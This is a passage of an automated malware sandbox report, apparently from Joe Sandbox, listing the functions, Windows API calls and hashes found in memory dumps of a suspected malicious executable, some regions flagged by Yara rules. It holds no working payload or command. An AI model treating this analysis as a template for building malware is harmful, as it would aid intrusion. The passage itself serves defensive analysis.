                                            • GetLastError.KERNEL32(?,0040CA48,00000000,?,0042D0F8,?,?,?,0040CBEB,00000004,InitializeCriticalSectionEx,00420B18,InitializeCriticalSectionEx,00000000,?,0040C836), ref: 0040CAAE
                                            • LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 0040CAD6
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2664608279.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                            Similarity
                                            • API ID: LibraryLoad$ErrorLast
                                            • String ID: api-ms-
                                            • API String ID: 3177248105-2084034818
                                            • Opcode ID: 6ea35a358fe08483aaca9864d5c7ce1afea2c26e9c9286d7bdd8822d2b58ffa3
                                            • Instruction ID: aef67c255cc06d75e4f2c7ed4f9f6bc06eb467b970858842cb7b754112db4c8a
                                            • Opcode Fuzzy Hash: 6ea35a358fe08483aaca9864d5c7ce1afea2c26e9c9286d7bdd8822d2b58ffa3
                                            • Instruction Fuzzy Hash: 12E01230380308F6EF105F61ED46B5A3F569B11B54F108131F90DF85E1D7B5A815998C
                                            APIs
                                            • GetConsoleOutputCP.KERNEL32(92291A76,00000000,00000000,00000000), ref: 004196EF
                                              • Part of subcall function 00414F58: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,004151BB,?,00000000,-00000008), ref: 00414FB9
                                            • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00419941
                                            • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00419987
                                            • GetLastError.KERNEL32 ref: 00419A2A
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2664608279.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                            Similarity
                                            • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                                            • String ID:
                                            • API String ID: 2112829910-0
                                            • Opcode ID: 7b6b5b0f837ac57406110df98857d0f42911bc00a2c7897a29ebb1bace7e2d44
                                            • Instruction ID: 80e927e20e1d5b3063f5f9ef1e9119d7a86b1541eeacf5ee68ba8f7951c90f01
                                            • Opcode Fuzzy Hash: 7b6b5b0f837ac57406110df98857d0f42911bc00a2c7897a29ebb1bace7e2d44
                                            • Instruction Fuzzy Hash: 8CD18DB5E002489FCF15CFA8C8909EEBBB5FF49314F28412AE456EB351D634AD86CB54
                                            APIs
                                            • GetConsoleOutputCP.KERNEL32(0042C014,00000000,00000000,00000000), ref: 04D29956
                                              • Part of subcall function 04D251BF: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,04D25422,?,00000000,-00000008), ref: 04D25220
                                            • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 04D29BA8
                                            • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 04D29BEE
                                            • GetLastError.KERNEL32 ref: 04D29C91
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2667150208.0000000004D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D10000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_4d10000_file.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                                            • String ID:
                                            • API String ID: 2112829910-0
                                            • Opcode ID: da9c2254c3d6feb7781c277c4017dde1248fb7d9dc01eb7e01956cc2f511bebb
                                            • Instruction ID: 56d22a9b93d6ad10f1e8b024d20fb3950584ff2cda9d6651bc467ac9500f8485
                                            • Opcode Fuzzy Hash: da9c2254c3d6feb7781c277c4017dde1248fb7d9dc01eb7e01956cc2f511bebb
                                            • Instruction Fuzzy Hash: 61D1BDB5E042689FDF14CFA8C9909EDBBF4FF58318F24456AE456EB351D630A941CB20
                                            APIs
                                            • InternetSetFilePointer.WININET(?,00000000,00000000,00000000,00000000), ref: 04D11C3C
                                            • InternetReadFile.WININET(?,00000000,000003E8,00000000), ref: 04D11C5F
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2667150208.0000000004D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D10000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_4d10000_file.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: FileInternet$PointerRead
                                            • String ID:
                                            • API String ID: 3197321146-0
                                            • Opcode ID: 1885a8dfee8479765fa90636c8dddbf3c0bf84813e2bd3c7ed7779aacb4cd4c8
                                            • Instruction ID: 260dde4263ead14417981b52c7cfba8d79550e4a88f79ea14ec7974bf7de0489
                                            • Opcode Fuzzy Hash: 1885a8dfee8479765fa90636c8dddbf3c0bf84813e2bd3c7ed7779aacb4cd4c8
                                            • Instruction Fuzzy Hash: 24C139B1A00218AFEB25CF54DC84BD9B7B5FF49304F1041D9E909A72A0D771BA94CFA5
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2664608279.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                            Similarity
                                            • API ID: AdjustPointer
                                            • String ID:
                                            • API String ID: 1740715915-0
                                            • Opcode ID: bf321dce71054df2b862cad56193e6d87e1aafecfb24913b63c52c13f6cff331
                                            • Instruction ID: c3f9129e04d39096db86ee3dbd798fa579d010b72ca6babdac1055268f0b1971
                                            • Opcode Fuzzy Hash: bf321dce71054df2b862cad56193e6d87e1aafecfb24913b63c52c13f6cff331
                                            • Instruction Fuzzy Hash: F651A972600306ABEB298F11C881BAA77B4EF40714F14413FE802A76D5E739AC91CBDD
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2667782007.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                            • Associated: 00000000.00000002.2667767061.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                            • Associated: 00000000.00000002.2667799628.0000000010011000.00000002.00001000.00020000.00000000.sdmp
                                            • Associated: 00000000.00000002.2667814596.0000000010018000.00000004.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_10000000_file.jbxd
                                            Similarity
                                            • API ID: AdjustPointer
                                            • String ID:
                                            • API String ID: 1740715915-0
                                            • Opcode ID: 952e73679afc7ae5e9be77ebdc85447c9e7c58ce1189e5957c3f15572caf07ac
                                            • Instruction ID: 9e97f9b43940e94c385e873cf65d718b9a08959cb0185780d8acf6a52a646172
                                            • Opcode Fuzzy Hash: 952e73679afc7ae5e9be77ebdc85447c9e7c58ce1189e5957c3f15572caf07ac
                                            • Instruction Fuzzy Hash: 9D51BFB6A04202AFFB16CF11D941BAB77A8EF047D0F11856DEA05A72A9DB31EC40D794
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2667150208.0000000004D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D10000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_4d10000_file.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: AdjustPointer
                                            • String ID:
                                            • API String ID: 1740715915-0
                                            • Opcode ID: bf321dce71054df2b862cad56193e6d87e1aafecfb24913b63c52c13f6cff331
                                            • Instruction ID: 7723936c01f8e571fce888b529973d916696b26603d863f48d39ee99b7425814
                                            • Opcode Fuzzy Hash: bf321dce71054df2b862cad56193e6d87e1aafecfb24913b63c52c13f6cff331
                                            • Instruction Fuzzy Hash: 8C518171705606BFEB298F54F880BAA77A4FF44714F14452EED864A6B0E731F981C790
                                            APIs
                                            • std::_Xinvalid_argument.LIBCPMT ref: 04D1183C
                                              • Part of subcall function 04D19AA9: std::invalid_argument::invalid_argument.LIBCONCRT ref: 04D19AB5
                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,12041A13,00000000,00000000,?,?,0042D884,?,?,?,0042DAF4), ref: 04D11872
                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,12041A13,00000000,?,0042D884,?,?,?,0042DAF4), ref: 04D118A9
                                            • Concurrency::cancel_current_task.LIBCPMT ref: 04D119BE
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2667150208.0000000004D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D10000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_4d10000_file.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: ByteCharMultiWide$Concurrency::cancel_current_taskXinvalid_argumentstd::_std::invalid_argument::invalid_argument
                                            • String ID:
                                            • API String ID: 2123813255-0
                                            • Opcode ID: 76bb2ae1955411a23ec2113ce7c3df1698fa8cdaa81397e4e46f03e77a8728ac
                                            • Instruction ID: 8c95ba85adaab4f2a0415ad367a6d6b55e2f1516e1bf0b14c95d0fe324838ea9
                                            • Opcode Fuzzy Hash: 76bb2ae1955411a23ec2113ce7c3df1698fa8cdaa81397e4e46f03e77a8728ac
                                            • Instruction Fuzzy Hash: 7A41F8F1B00304BBE7149F64AC85B5EB6F8EF49214F100669EE6AD72A0E771B904C7A1
                                            APIs
                                              • Part of subcall function 10008DC4: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,00000000,00000000,?,1000B163,?,00000000,00000000), ref: 10008E70
                                            • GetLastError.KERNEL32 ref: 10007C36
                                            • __dosmaperr.LIBCMT ref: 10007C3D
                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 10007C7C
                                            • __dosmaperr.LIBCMT ref: 10007C83
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2667782007.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                            • Associated: 00000000.00000002.2667767061.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                            • Associated: 00000000.00000002.2667799628.0000000010011000.00000002.00001000.00020000.00000000.sdmp
                                            • Associated: 00000000.00000002.2667814596.0000000010018000.00000004.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_10000000_file.jbxd
                                            Similarity
                                            • API ID: ErrorLast__dosmaperr$ByteCharMultiWide
                                            • String ID:
                                            • API String ID: 1913693674-0
                                            • Opcode ID: c5759a61a7976f34472f3230490c401b0bdcfc1ff84e849ca2e690b48099d67c
                                            • Instruction ID: 4d86bd2ae757562d8160192595c5732c56f34f1228d97d68919d00ee2a874974
                                            • Opcode Fuzzy Hash: c5759a61a7976f34472f3230490c401b0bdcfc1ff84e849ca2e690b48099d67c
                                            • Instruction Fuzzy Hash: 9021AC75A00216AFB720DF658C85D5BB7ADFF042E4B108529FA699724ADB35EC408BA0
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2667782007.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                            • Associated: 00000000.00000002.2667767061.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                            • Associated: 00000000.00000002.2667799628.0000000010011000.00000002.00001000.00020000.00000000.sdmp
                                            • Associated: 00000000.00000002.2667814596.0000000010018000.00000004.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_10000000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 7fde20d58f3e1108cd5a86cb085c551b539ad6d33639cd9718ad33b154971d06
                                            • Instruction ID: d1df9cd49d1a9d965a935ddcfcfd3b9185eaf4079d6f623355f3cc1fa6217373
                                            • Opcode Fuzzy Hash: 7fde20d58f3e1108cd5a86cb085c551b539ad6d33639cd9718ad33b154971d06
                                            • Instruction Fuzzy Hash: C821D075A00206BFF710DF61CC8090B779CFF846E47108124FA949215AEB31EF0087A0
                                            APIs
                                              • Part of subcall function 00414F58: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,004151BB,?,00000000,-00000008), ref: 00414FB9
                                            • GetLastError.KERNEL32 ref: 00417508
                                            • __dosmaperr.LIBCMT ref: 0041750F
                                            • GetLastError.KERNEL32(?,?,?,?), ref: 00417549
                                            • __dosmaperr.LIBCMT ref: 00417550
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2664608279.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                            Similarity
                                            • API ID: ErrorLast__dosmaperr$ByteCharMultiWide
                                            • String ID:
                                            • API String ID: 1913693674-0
                                            • Opcode ID: fff5e27c2a9c5f498cd8e37e9d2e5b67da44c55886b9eb81921f36740ae9eac4
                                            • Instruction ID: 408a06d1cf8366b2ae1f3811782f7cd1de2d149ac6df674c503089c6b33b154d
                                            • Opcode Fuzzy Hash: fff5e27c2a9c5f498cd8e37e9d2e5b67da44c55886b9eb81921f36740ae9eac4
                                            • Instruction Fuzzy Hash: 2B21CD716042057FDB20AF66C880CAB7779EF44368710852AF91997751D739ED818768
                                            APIs
                                              • Part of subcall function 04D251BF: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,04D25422,?,00000000,-00000008), ref: 04D25220
                                            • GetLastError.KERNEL32 ref: 04D2776F
                                            • __dosmaperr.LIBCMT ref: 04D27776
                                            • GetLastError.KERNEL32(?,?,?,?), ref: 04D277B0
                                            • __dosmaperr.LIBCMT ref: 04D277B7
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2667150208.0000000004D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D10000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_4d10000_file.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: ErrorLast__dosmaperr$ByteCharMultiWide
                                            • String ID:
                                            • API String ID: 1913693674-0
                                            • Opcode ID: fff5e27c2a9c5f498cd8e37e9d2e5b67da44c55886b9eb81921f36740ae9eac4
                                            • Instruction ID: 280c399ba042579c2fc3ae47cebecef15212a04233ce6ae6dae1112c47091d77
                                            • Opcode Fuzzy Hash: fff5e27c2a9c5f498cd8e37e9d2e5b67da44c55886b9eb81921f36740ae9eac4
                                            • Instruction Fuzzy Hash: ED219271700226BFAB30AF71DE80C6BB7A9FF1826C7108528E92997150E730FC018770
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2664608279.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: daefbb992f6e98e82da9deec0440fc20cde4ea8490cf1120197b10a32be04fa6
                                            • Instruction ID: c7293b4e2709a45a538168f771ca0d14dcb5837bd486a4ca313c9b6cb4d0090e
                                            • Opcode Fuzzy Hash: daefbb992f6e98e82da9deec0440fc20cde4ea8490cf1120197b10a32be04fa6
                                            • Instruction Fuzzy Hash: DF21C971600219AFDB20AF659C40DEB776DAF44368B10456BFA29E7261D738DC8187A8
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2667150208.0000000004D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D10000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_4d10000_file.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: daefbb992f6e98e82da9deec0440fc20cde4ea8490cf1120197b10a32be04fa6
                                            • Instruction ID: a904d35281b7c39fd1926154ce7aed044de77ccbcc410fb24b39f756da913375
                                            • Opcode Fuzzy Hash: daefbb992f6e98e82da9deec0440fc20cde4ea8490cf1120197b10a32be04fa6
                                            • Instruction Fuzzy Hash: AF21A431300626BFAB10AFA49E8496F77BAFF5426C700C525E91A97150E730FC0187A0
                                            APIs
                                            • GetEnvironmentStringsW.KERNEL32 ref: 0041844D
                                              • Part of subcall function 00414F58: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,004151BB,?,00000000,-00000008), ref: 00414FB9
                                            • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00418485
                                            • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 004184A5
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2664608279.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                            Similarity
                                            • API ID: EnvironmentStrings$Free$ByteCharMultiWide
                                            • String ID:
                                            • API String ID: 158306478-0
                                            • Opcode ID: 42e04dca39cc9313a1bac36138922e873b2761e214a8738c343e5be4cc190242
                                            • Instruction ID: 9202fe00a5822ec58f1db5debff3a6e736622b39abe9cc99b2a2d556b75614f5
                                            • Opcode Fuzzy Hash: 42e04dca39cc9313a1bac36138922e873b2761e214a8738c343e5be4cc190242
                                            • Instruction Fuzzy Hash: A01104B65005167F6B212BB25D89CEF295CDF89398721402EF905A1201FE2CDE8241BE
                                            APIs
                                            • FreeLibrary.KERNEL32(00000000,?,04D236AF,04D137FE,?,00000000,04D12A70,04D12A72,?,04D23828,00000022,00420B0C,00422950,00422958,04D12A70), ref: 04D23661
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2667150208.0000000004D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D10000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_4d10000_file.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: FreeLibrary
                                            • String ID:
                                            • API String ID: 3664257935-0
                                            • Opcode ID: b8c7e483e8ea991eea5b44eb111e182d5bd336103010429673e37ca0c8998616
                                            • Instruction ID: 746fdf7cb4bd243c65a63a4065a865ec1cf90f89ac346b1e7bfdbe2ba18d3142
                                            • Opcode Fuzzy Hash: b8c7e483e8ea991eea5b44eb111e182d5bd336103010429673e37ca0c8998616
                                            • Instruction Fuzzy Hash: 95210571B01221ABC7319F34ED44B9A3B6DEB51B69F110130ED05A7391DB38FE02CA94
                                            APIs
                                            • GetEnvironmentStringsW.KERNEL32 ref: 04D286B4
                                              • Part of subcall function 04D251BF: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,04D25422,?,00000000,-00000008), ref: 04D25220
                                            • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 04D286EC
                                            • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 04D2870C
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2667150208.0000000004D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D10000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_4d10000_file.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: EnvironmentStrings$Free$ByteCharMultiWide
                                            • String ID:
                                            • API String ID: 158306478-0
                                            • Opcode ID: f25717e6bd25f80c70edce058ac37b14eb42a5c51d25e47d03568e648881f521
                                            • Instruction ID: 6b450834c98b68d0c06934e978a113414a26fef8d8b2b0790b71c5f12996d638
                                            • Opcode Fuzzy Hash: f25717e6bd25f80c70edce058ac37b14eb42a5c51d25e47d03568e648881f521
                                            • Instruction Fuzzy Hash: 5211C4B6A0113A7E7B213B725ECCCBF2DADDEA919D7100234F905A2100FA64EE0191B5
                                            APIs
                                            • WriteConsoleW.KERNEL32(00000000,00000000,?,00000000,00000000,?,0041C85F,00000000,00000001,?,00000000,?,00419A7E,00000000,00000000,00000000), ref: 0041CBFF
                                            • GetLastError.KERNEL32(?,0041C85F,00000000,00000001,?,00000000,?,00419A7E,00000000,00000000,00000000,00000000,00000000,?,0041A021,?), ref: 0041CC0B
                                              • Part of subcall function 0041CBD1: CloseHandle.KERNEL32(FFFFFFFE,0041CC1B,?,0041C85F,00000000,00000001,?,00000000,?,00419A7E,00000000,00000000,00000000,00000000,00000000), ref: 0041CBE1
                                            • ___initconout.LIBCMT ref: 0041CC1B
                                              • Part of subcall function 0041CB93: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,0041CBC2,0041C84C,00000000,?,00419A7E,00000000,00000000,00000000,00000000), ref: 0041CBA6
                                            • WriteConsoleW.KERNEL32(00000000,00000000,?,00000000,?,0041C85F,00000000,00000001,?,00000000,?,00419A7E,00000000,00000000,00000000,00000000), ref: 0041CC30
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2664608279.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                            Similarity
                                            • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                            • String ID:
                                            • API String ID: 2744216297-0
                                            • Opcode ID: e3757025193b1f655bc0a77c3c1a7d52d6e2513ac00293883d9defc3f3400d05
                                            • Instruction ID: b2f8e5e77f4d676ad0e685e0439cc39e0844638a97b8ad054d7e4805cd8d945f
                                            • Opcode Fuzzy Hash: e3757025193b1f655bc0a77c3c1a7d52d6e2513ac00293883d9defc3f3400d05
                                            • Instruction Fuzzy Hash: D6F01C36580118BBCF221F95ED45ADA3F26FF497A0B404031FA0D96121D6328C619BD8
                                            APIs
                                            • WriteConsoleW.KERNEL32(?,?,00000000,00000000,?,?,1000C7E8,?,00000001,?,00000001,?,1000BAAF,?,?,00000001), ref: 1000CD39
                                            • GetLastError.KERNEL32(?,1000C7E8,?,00000001,?,00000001,?,1000BAAF,?,?,00000001,?,00000001,?,1000BFFB,10009A1A), ref: 1000CD45
                                              • Part of subcall function 1000CD0B: CloseHandle.KERNEL32(FFFFFFFE,1000CD55,?,1000C7E8,?,00000001,?,00000001,?,1000BAAF,?,?,00000001,?,00000001), ref: 1000CD1B
                                            • ___initconout.LIBCMT ref: 1000CD55
                                              • Part of subcall function 1000CCCD: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,1000CCFC,1000C7D5,00000001,?,1000BAAF,?,?,00000001,?), ref: 1000CCE0
                                            • WriteConsoleW.KERNEL32(?,?,00000000,00000000,?,1000C7E8,?,00000001,?,00000001,?,1000BAAF,?,?,00000001,?), ref: 1000CD6A
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2667782007.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                            • Associated: 00000000.00000002.2667767061.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                            • Associated: 00000000.00000002.2667799628.0000000010011000.00000002.00001000.00020000.00000000.sdmp
                                            • Associated: 00000000.00000002.2667814596.0000000010018000.00000004.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_10000000_file.jbxd
                                            Similarity
                                            • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                            • String ID:
                                            • API String ID: 2744216297-0
                                            • Opcode ID: 2cecfe65eba2e63a17b5684705d35a016e8c273fc96426fc022e5dbf763bb7f4
                                            • Instruction ID: e182fa176b596d651ba3484f1012657cf00b5fef4cb1dd311ab1bc31a0a6f155
                                            • Opcode Fuzzy Hash: 2cecfe65eba2e63a17b5684705d35a016e8c273fc96426fc022e5dbf763bb7f4
                                            • Instruction Fuzzy Hash: 53F030368002A9BBEF125F95CC48EC93FA6FB0D3E0F018025FA0885130DA32C9609B90
                                            APIs
                                            • WriteConsoleW.KERNEL32(00000000,00000000,?,00000000,00000000,?,04D2CAC6,00000000,00000001,?,00000000,?,04D29CE5,00000000,00000000,00000000), ref: 04D2CE66
                                            • GetLastError.KERNEL32(?,04D2CAC6,00000000,00000001,?,00000000,?,04D29CE5,00000000,00000000,00000000,00000000,00000000,?,04D2A288,?), ref: 04D2CE72
                                              • Part of subcall function 04D2CE38: CloseHandle.KERNEL32(0042CA30,04D2CE82,?,04D2CAC6,00000000,00000001,?,00000000,?,04D29CE5,00000000,00000000,00000000,00000000,00000000), ref: 04D2CE48
                                            • ___initconout.LIBCMT ref: 04D2CE82
                                              • Part of subcall function 04D2CDFA: CreateFileW.KERNEL32(00428728,40000000,00000003,00000000,00000003,00000000,00000000,04D2CE29,04D2CAB3,00000000,?,04D29CE5,00000000,00000000,00000000,00000000), ref: 04D2CE0D
                                            • WriteConsoleW.KERNEL32(00000000,00000000,?,00000000,?,04D2CAC6,00000000,00000001,?,00000000,?,04D29CE5,00000000,00000000,00000000,00000000), ref: 04D2CE97
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2667150208.0000000004D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D10000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_4d10000_file.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                            • String ID:
                                            • API String ID: 2744216297-0
                                            • Opcode ID: e3757025193b1f655bc0a77c3c1a7d52d6e2513ac00293883d9defc3f3400d05
                                            • Instruction ID: ba32f5e7c7f589ee395ab4612f280422cb2f8a981fbc1d83efa3df1cc017ee2f
                                            • Opcode Fuzzy Hash: e3757025193b1f655bc0a77c3c1a7d52d6e2513ac00293883d9defc3f3400d05
                                            • Instruction Fuzzy Hash: 25F0303A550128BBCF725F95DD04ADD3F26FF08AA5B404030FA2996130D7329C219BD5
                                            APIs
                                            • SleepConditionVariableCS.KERNELBASE(?,00409CAA,00000064), ref: 00409D30
                                            • LeaveCriticalSection.KERNEL32(0042D064,00401044,?,00409CAA,00000064,?,?,?,00401044,0042DA8C), ref: 00409D3A
                                            • WaitForSingleObjectEx.KERNEL32(00401044,00000000,?,00409CAA,00000064,?,?,?,00401044,0042DA8C), ref: 00409D4B
                                            • EnterCriticalSection.KERNEL32(0042D064,?,00409CAA,00000064,?,?,?,00401044,0042DA8C), ref: 00409D52
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2664608279.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                            Similarity
                                            • API ID: CriticalSection$ConditionEnterLeaveObjectSingleSleepVariableWait
                                            • String ID:
                                            • API String ID: 3269011525-0
                                            • Opcode ID: 203c7f3a807ec8057ea0aa5072313220b9e23051332dfe18f360eb7747514d6b
                                            • Instruction ID: ed1c7c09b24d5124ebc712e1e7f2573f2e40a4f9289d25860d0ee5ca28a3c269
                                            • Opcode Fuzzy Hash: 203c7f3a807ec8057ea0aa5072313220b9e23051332dfe18f360eb7747514d6b
                                            • Instruction Fuzzy Hash: 8FE0ED31A85628FBCB111B50FC09AD97F24AF09759F508032F90976171C7795D039BDD
                                            APIs
                                            • __startOneArgErrorHandling.LIBCMT ref: 00410F6D
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2664608279.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                            Similarity
                                            • API ID: ErrorHandling__start
                                            • String ID: pow
                                            • API String ID: 3213639722-2276729525
                                            • Opcode ID: 31403c08627a7049c2df153d0248aecbd7cedb7773a1804d7f4783afb4547b5b
                                            • Instruction ID: 1dd945e64f0d07477a36e3934c2b0d008af5dc79b4df0e8c4bba017ec81d751d
                                            • Opcode Fuzzy Hash: 31403c08627a7049c2df153d0248aecbd7cedb7773a1804d7f4783afb4547b5b
                                            • Instruction Fuzzy Hash: 65512B75A0820296CB217714DA023EB6BA49B40750F618D6FF095463E9EBBCCCD7DA4E
                                            APIs
                                            • Concurrency::cancel_current_task.LIBCPMT ref: 004096CE
                                            • std::_Xinvalid_argument.LIBCPMT ref: 004096E5
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2664608279.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                            Similarity
                                            • API ID: Concurrency::cancel_current_taskXinvalid_argumentstd::_
                                            • String ID: vector too long
                                            • API String ID: 3646673767-2873823879
                                            • Opcode ID: 76399865d75423f55fc174df7396f940014b7bb3f785ca2fba6546e7ea2eb098
                                            • Instruction ID: f4da2a5e80598445161bac14147e50f437b92e93805fe79093e1120e4695fd56
                                            • Opcode Fuzzy Hash: 76399865d75423f55fc174df7396f940014b7bb3f785ca2fba6546e7ea2eb098
                                            • Instruction Fuzzy Hash: 5A5125B2E002159BCB14DF69C84066EB7A5EF80314F10067FE805FB382EB75AD408BD5
                                            APIs
                                            • ___except_validate_context_record.LIBVCRUNTIME ref: 04D1BA66
                                            • __IsNonwritableInCurrentImage.LIBCMT ref: 04D1BB1A
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2667150208.0000000004D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D10000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_4d10000_file.jbxd
